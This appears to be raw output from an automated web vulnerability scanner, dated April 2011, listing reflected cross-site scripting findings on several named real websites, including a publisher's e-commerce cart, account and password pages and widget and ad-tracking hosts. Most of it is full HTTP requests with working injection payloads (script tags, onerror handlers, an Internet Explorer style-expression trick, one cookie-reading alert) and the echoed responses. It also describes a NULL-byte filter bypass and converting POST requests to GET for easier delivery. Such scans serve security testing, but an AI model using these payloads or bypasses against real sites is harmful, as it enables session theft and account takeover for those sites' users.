GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=98717<script>alert(1)</script>403ae54048e& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 567db<img%20src%3da%20onerror%3dalert(1)>4321673800c was submitted in the REST URL parameter 18. This input was echoed as 567db<img src=a onerror=alert(1)>4321673800c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img%20src%3da%20onerror%3dalert(1)>4321673800c/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:09 GMT Expires: Fri, 29 Apr 2011 21:50:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3871
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74b03<a>2abf9f455e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:48:26 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442 was submitted in the REST URL parameter 18. This input was echoed as 780d0<img src=a onerror=alert(1)>252d78a442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 3912
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16936<a>d3f95d2f680 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:14 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2 was submitted in the REST URL parameter 18. This input was echoed as b607c<img src=a onerror=alert(1)>58e425fd2c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:27 GMT Expires: Fri, 29 Apr 2011 21:48:27 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 7210
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78066<a>4feec1bf34c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:46:37 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413 was submitted in the REST URL parameter 18. This input was echoed as b670d<img src=a onerror=alert(1)>0648de1f413 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:51:54 GMT Expires: Fri, 29 Apr 2011 21:50:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 2654
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5147c<a>ad3be1bde7f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Tue, 26 Apr 2011 21:49:04 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 1162
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0666<script>alert(1)</script>06d3328fdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css?48996 HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 26 Apr 2011 21:48:52 GMT Expires: Thu, 31 Dec 2020 00:00:00 GMT Last-Modified: Wed, 20 Apr 2011 23:47:00 GMT max-age: 604800 P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 119
The requested resource(/syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css) is not available
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1d121<script>alert(1)</script>cb3f46b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 130 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:15 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:15 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 26 Apr 2011 23:30:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 26 Apr 2011 23:30:15 GMT Connection: close
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %00de38d<script>alert(1)</script>e9bd80595cd was submitted in the from parameter. This input was echoed as de38d<script>alert(1)</script>e9bd80595cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49283"%3balert(1)//e4e0e74635 was submitted in the from parameter. This input was echoed as 49283";alert(1)//e4e0e74635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse49283"%3balert(1)//e4e0e74635 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse49283";alert(1)//e4e0e74635"; //--> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17962"><script>alert(1)</script>6f8a1d41037 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037 HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f99'%3balert(1)//44955d1d1a9 was submitted in the from parameter. This input was echoed as 74f99';alert(1)//44955d1d1a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /account.do?from=74f99'%3balert(1)//44955d1d1a9 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:46 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16995
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( '74f99';alert(1)//44955d1d1a9' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d54"><script>alert(1)</script>e958056cf4c was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a0"%3balert(1)//4a17c54e7d8 was submitted in the from parameter. This input was echoed as 584a0";alert(1)//4a17c54e7d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /account.do?from=randomhouse584a0"%3balert(1)//4a17c54e7d8 HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse584a0";alert(1)//4a17c54e7d8"; //--> ...[SNIP]...
The value of the confirmPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef75"><script>alert(1)</script>4190709400fddb906 was submitted in the confirmPassword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the email request parameter is copied into the HTML document as plain text between tags. The payload 41e31<script>alert(1)</script>df5ae1c2f9536e1ca was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc3b"><script>alert(1)</script>a734b570e5619ecdd was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c691"><script>alert(1)</script>070b45f3bf0 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %0086d84<script>alert(1)</script>db18887c0e9 was submitted in the from parameter. This input was echoed as 86d84<script>alert(1)</script>db18887c0e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 was submitted in the from parameter. This input was echoed as 2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /password.do?from=2402d"style%3d"x%3aexpr/**/ession(alert(1))"942e8dd2de1 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:27 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11462
<!-- forgottenPassword.vm -->
